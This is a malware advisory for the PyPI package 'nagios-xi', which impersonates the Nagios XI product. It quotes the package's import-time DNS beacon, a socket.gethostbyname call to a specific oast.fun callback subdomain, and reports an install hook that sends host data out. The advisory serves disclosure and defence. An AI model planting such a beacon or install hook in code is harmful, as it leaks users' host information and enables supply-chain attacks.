MAL-2026-5698
Malicious code in nagios-xi (PyPI)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f) On `import nagios_xi`, the package's `__init__.py` (lines 5-8) invokes `socket.gethostbyname("atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun")` inside a silent try/except. oast.fun is ProjectDiscovery's Interactsh out-of-band callback service; the DNS query itself is the exfiltration channel, confirming code execution on the installer's host and leaking the resolver IP to whoever controls the unique 32-character Interactsh subdomain. The package ships no actual functionality — it impersonates the Nagios XI commercial monitoring product (name `nagios-xi`, version `19.5.0` mimicking real Nagios XI versioning) while declaring an anonymous ProtonMail author (`Coding Team <pocbug@protonmail.com>`), a generic `package utility` description, and an empty README. The combination of brand impersonation, placeholder metadata, and an import-time OAST beacon as the package's sole behavior is reconnaissance for a supply-chain attack against developers searching for Nagios XI integrations.
## Source: kam193 (d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23) Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
---
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
- The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
- The package overrides the install command in setup.py to execute malicious code during installation.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for nagios-xi (pip). Pin to a known-safe version or switch to an alternative.